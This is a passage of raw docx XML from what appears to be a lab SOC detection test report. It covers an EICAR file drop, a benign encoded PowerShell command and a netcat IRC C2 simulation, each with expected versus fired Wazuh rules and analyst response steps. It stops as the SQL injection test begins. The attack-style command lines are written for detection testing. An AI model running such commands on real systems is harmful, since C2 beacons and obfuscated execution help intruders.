        <w:spacing w:before="40" w:after="40"/>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006A4C56">
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Block attacker IP 192.168.0.159 (firewall/host) and terminate active sessions.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DA2F7CD" w14:textId="77777777" w:rsidR="006A4C56" w:rsidRPr="006A4C56" w:rsidRDefault="006A4C56" w:rsidP="006A4C56">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006A4C56">
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Quarantine 192.168.1.151; preserve volatile evidence (memory, running processes).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="200954E2" w14:textId="77777777" w:rsidR="006A4C56" w:rsidRPr="006A4C56" w:rsidRDefault="006A4C56" w:rsidP="006A4C56">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006A4C56">
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Collect forensic artifacts: crontabs (/var/spool/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006A4C56">
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>cron</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006A4C56">
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>/crontabs/root, /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006A4C56">
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>etc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006A4C56">
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="006A4C56">
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>cron.d</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="006A4C56">
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>), related logs, and compute/store hashes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66B5ECAC" w14:textId="443625B7" w:rsidR="006A4C56" w:rsidRPr="006A4C56" w:rsidRDefault="006A4C56" w:rsidP="006A4C56">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006A4C56">
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">Remove the malicious </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006A4C56">
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>cron</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006A4C56">
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> entry, scan for other persistence (users, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006A4C56">
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>systemd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006A4C56">
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> timers, startup scripts), rotate credentials; rebuild if compromise confirmed.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BE416CE" w14:textId="77777777" w:rsidR="00FE45BE" w:rsidRDefault="00FE45BE" w:rsidP="00FE45BE">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4B4D00C9" w14:textId="75DA2AB5" w:rsidR="00FE45BE" w:rsidRDefault="006A4C56" w:rsidP="00FE45BE">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0E4EF439" wp14:editId="45B71CE4">
            <wp:extent cx="6400800" cy="3132455"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="2999091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61DB5" w14:textId="77777777" w:rsidR="002117B2" w:rsidRDefault="002117B2">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="280"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0880D56C" w14:textId="6107019F" w:rsidR="008A552D" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="280"/>
      </w:pPr>
      <w:r>
        <w:t>Test 8: Attack 8 — EICAR Test File</w:t>
      </w:r>
    </w:p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2199"/>
        <w:gridCol w:w="7161"/>
      </w:tblGrid>
      <w:tr w:rsidR="008A552D" w14:paraId="00871144" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2199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</w:tcPr>
          <w:p w14:paraId="51884A3A" w14:textId="77777777" w:rsidR="008A552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</w:tcPr>
          <w:p w14:paraId="74948389" w14:textId="77777777" w:rsidR="008A552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8A552D" w14:paraId="40B114D2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bottom w:w="80" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="58ADFFCB" w14:textId="77777777" w:rsidR="008A552D" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Attack Tool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63B0164" w14:textId="77777777" w:rsidR="008A552D" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>PowerShell Set-Content</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008A552D" w14:paraId="0252F153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4789EAB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Expected Rule/SID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26BF2EC" w14:textId="77777777" w:rsidR="008A552D" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Rule 87105 — </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>VirusTotal</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>: Alert - x engines detected this file</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008A552D" w14:paraId="1BA9432F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300A95D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Actual Rule Fired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B6E25B5" w14:textId="1A504863" w:rsidR="008A552D" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>621</w:t>
            </w:r>
            <w:r w:rsidR="00BA7CEC">
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>23</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008A552D" w14:paraId="703E45E9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47831EEA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Rule Level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C45E3BB" w14:textId="77777777" w:rsidR="008A552D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</w:tr>
    </w:tbl>
    <w:p w14:paraId="200CF8B4" w14:textId="77777777" w:rsidR="008A552D" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="160" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Command Used:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CADCB03" w14:textId="77777777" w:rsidR="008A552D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Set-Content -Path "C:\Users\Public\eicar.com" -Value 'X5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O!P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%@AP[4\PZX54(P^)7CC)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7}$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EICAR-STANDARD-ANTIVIRUS-TEST-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FILE!$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H+H*'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2251FFB8" w14:textId="77777777" w:rsidR="008A552D" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="160" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Recommended SOC Analyst Response:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3ECBF037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1. Verify if Windows Defender quarantined the file.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30CB3490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2. If 87105 had fired, escalate immediately as confirmed malware.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EAC5632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3. Cross-reference file hash against threat intelligence feeds.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3473ACDB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4. Investigate how the file arrived on the system.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54BB2E97" w14:textId="77777777" w:rsidR="008A552D" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>5. Check for other suspicious files in the same directory.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33073BC3" w14:textId="6E6C5261" w:rsidR="00634F7E" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:pict w14:anchorId="6ED835DD">
          <v:rect id="_x0000_s1026" style="position:absolute;left:0;text-align:left;margin-left:32.4pt;margin-top:125.4pt;width:351pt;height:9.3pt;z-index:251658240" filled="f" strokecolor="#a33e03 [3206]" strokeweight="1pt"/>
        </w:pict>
      </w:r>
      <w:r w:rsidR="00634F7E">
        <w:rPr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84BB20E" wp14:editId="5A7F726B">
            <wp:extent cx="5552751" cy="3139440"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="606534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050" cy="3143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73950" w14:textId="77777777" w:rsidR="008A552D" w:rsidRDefault="008A552D">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="465E7F77" w14:textId="7D977479" w:rsidR="008A552D" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="280"/>
      </w:pPr>
      <w:r>
        <w:t>Test 9: Attack 9 — Suspicious Encoded PowerShell</w:t>
      </w:r>
    </w:p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2199"/>
        <w:gridCol w:w="7161"/>
      </w:tblGrid>
      <w:tr w:rsidR="008A552D" w14:paraId="133B6D75" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2199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</w:tcPr>
          <w:p w14:paraId="324CC40F" w14:textId="77777777" w:rsidR="008A552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</w:tcPr>
          <w:p w14:paraId="460A4665" w14:textId="77777777" w:rsidR="008A552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8A552D" w14:paraId="5048C82A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bottom w:w="80" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="69E2D008" w14:textId="77777777" w:rsidR="008A552D" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Attack Tool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D53BB64" w14:textId="77777777" w:rsidR="008A552D" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>PowerShell -</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>EncodedCommand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flag</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008A552D" w14:paraId="4C00358D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333CF1F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Expected Rule/SID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459DA643" w14:textId="6D666A2E" w:rsidR="008A552D" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Rule 61603</w:t>
            </w:r>
            <w:r w:rsidR="00BA7CEC">
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"> and </w:t>
            </w:r>
            <w:r w:rsidR="00BA7CEC">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>92200</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008A552D" w14:paraId="11B63FA0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F133A90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Actual Rule Fired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FBA8612" w14:textId="7365B701" w:rsidR="008A552D" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>92057 (base64 encoded command)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008A552D" w14:paraId="1D2915B1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7B3A3DC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Rule Level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1A1F461" w14:textId="5DF22CDE" w:rsidR="008A552D" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>12</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="4C31E2B8" w14:textId="77777777" w:rsidR="008A552D" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="160" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Command Used:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30D38842" w14:textId="77777777" w:rsidR="008A552D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powershell.exe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EncodedCommand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"VwByAGkAdABlAC0ASABvAHMAdAAgACcAVABlAHMAdAAnAA=="</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E1F1688" w14:textId="58D8CBBF" w:rsidR="008A552D" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="160" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Recommended SOC Analyst Response:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49B02EFB" w14:textId="710F7606" w:rsidR="008A552D" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>1. Treat level 15 as critical, should respond immediately.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07072948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 xml:space="preserve">2. Decode the </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>base64</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> command to inspect actual payload.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38C75752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3. Identify the user account that ran the command.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="526DA60D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4. Check if any files were dropped or network connections made.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53882294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5. Review full PowerShell script block logging for context.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28A36A26" w14:textId="15500529" w:rsidR="008A552D" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>6. Consider isolating the endpoint pending investigation.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DC9E7FC" w14:textId="39E2B0F0" w:rsidR="00634F7E" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:pict w14:anchorId="6ED835DD">
          <v:rect id="_x0000_s1029" style="position:absolute;left:0;text-align:left;margin-left:33.3pt;margin-top:186.6pt;width:351pt;height:9.3pt;z-index:251660288" filled="f" strokecolor="#a33e03 [3206]" strokeweight="1pt"/>
        </w:pict>
      </w:r>
      <w:r w:rsidR="00634F7E">
        <w:rPr>
          <w:noProof/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="72E6465E" wp14:editId="48AAC61F">
            <wp:extent cx="5539740" cy="3124982"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="218546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00" cy="3127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BFA3D" w14:textId="77777777" w:rsidR="008A552D" w:rsidRDefault="008A552D">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="522BC61C" w14:textId="77777777" w:rsidR="008A552D" w:rsidRDefault="008A552D">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:before="320"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="57E8EBD7" w14:textId="77777777" w:rsidR="00634F7E" w:rsidRDefault="00634F7E">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:before="320"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="52F0D742" w14:textId="77777777" w:rsidR="008A552D" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="280"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Test 10: Attack 10 — </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Netcat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> C2 Channel Simulation</w:t>
      </w:r>
    </w:p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2199"/>
        <w:gridCol w:w="7161"/>
      </w:tblGrid>
      <w:tr w:rsidR="008A552D" w14:paraId="1042F69A" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2199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</w:tcPr>
          <w:p w14:paraId="7C7EE207" w14:textId="77777777" w:rsidR="008A552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</w:tcPr>
          <w:p w14:paraId="2AB22BB1" w14:textId="77777777" w:rsidR="008A552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8A552D" w14:paraId="0180A044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bottom w:w="80" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="73FB287E" w14:textId="77777777" w:rsidR="008A552D" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Attack Tool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54D4C9C" w14:textId="77777777" w:rsidR="008A552D" w:rsidRDefault="00000000">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Netcat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nc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8A552D" w14:paraId="236DFCD2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E910EE5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Source IP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DF537E4" w14:textId="77777777" w:rsidR="008A552D" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>192.168.1.131 (Kali)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008A552D" w14:paraId="37ADEA3C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D88D9B5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Destination IP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614D14B" w14:textId="77777777" w:rsidR="008A552D" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>192.168.1.130:6667 (Victim)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008A552D" w14:paraId="540E6A13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25FFDE49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Expected SID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3FF4BDE" w14:textId="77777777" w:rsidR="008A552D" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">ET POLICY / </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Wazuh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Rule 533</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008A552D" w14:paraId="479A591B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808405B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Expected Rule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F99BAA5" w14:textId="77777777" w:rsidR="008A552D" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>ET CHAT IRC commands (NICK, USER, JOIN, PRIVMSG)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008A552D" w14:paraId="00BED368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75942BE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Actual Alert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6623603" w14:textId="77777777" w:rsidR="008A552D" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">rule.id: 86601 — ET CHAT IRC NICK / USER / JOIN / PRIVMSG command detected in </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Wazuh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dashboard</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008A552D" w14:paraId="40016E15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3C0E6BE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A60D614" w14:textId="77777777" w:rsidR="008A552D" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Potential Corporate Privacy Violation / C2 Communication</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008A552D" w14:paraId="55CF300C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1E8EF4A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030A8F9" w14:textId="77777777" w:rsidR="008A552D" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Medium (Level 3)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="0873232A" w14:textId="77777777" w:rsidR="008A552D" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="160" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Command Used:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4418BDD3" w14:textId="77777777" w:rsidR="008A552D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Victim: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lvnp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6667</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04373101" w14:textId="77777777" w:rsidR="008A552D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Kali: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'NICK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evilbot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\r\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nUSER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evilbot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0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* :evil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\r\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nJOIN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#c2\r\n' |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192.168.1.130 6667</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="545FB5AD" w14:textId="77777777" w:rsidR="008A552D" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="160" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Recommended SOC Analyst Response:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76C97E2B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1. Immediately block all outbound IRC traffic (port 6667) at the firewall.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AFA2D09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2. Identify the process on the victim that established the connection.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A9E7E05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3. Isolate the compromised host from the network to prevent C2 communication.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D557829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4. Capture and preserve network traffic for forensic analysis.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22EF776A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5. Scan host for malware, backdoors, or persistence mechanisms.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57C4F207" w14:textId="77777777" w:rsidR="008A552D" w:rsidRDefault="008A552D">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3985CC30" w14:textId="77777777" w:rsidR="008A552D" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="0" distR="0" simplePos="0" relativeHeight="7" behindDoc="0" locked="0" layoutInCell="0" allowOverlap="1" wp14:anchorId="21C414EA" wp14:editId="7A63220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5676900"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapSquare wrapText="largest"/>
            <wp:docPr id="3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71884" w14:textId="77777777" w:rsidR="008A552D" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="280"/>
      </w:pPr>
      <w:r>
        <w:t>Test 11: Attack 11 — SQL Injection via DVWA</w:t>
      </w:r>
    </w:p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2199"/>
        <w:gridCol w:w="7161"/>
      </w:tblGrid>
      <w:tr w:rsidR="008A552D" w14:paraId="677BC00A" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2199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</w:tcPr>
          <w:p w14:paraId="0E7459F2" w14:textId="77777777" w:rsidR="008A552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</w:tcPr>
          <w:p w14:paraId="20AB5229" w14:textId="77777777" w:rsidR="008A552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8A552D" w14:paraId="54CAAFC0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bottom w:w="80" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="118334F9" w14:textId="77777777" w:rsidR="008A552D" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Attack Tool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193F92A" w14:textId="77777777" w:rsidR="008A552D" w:rsidRDefault="00000000">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
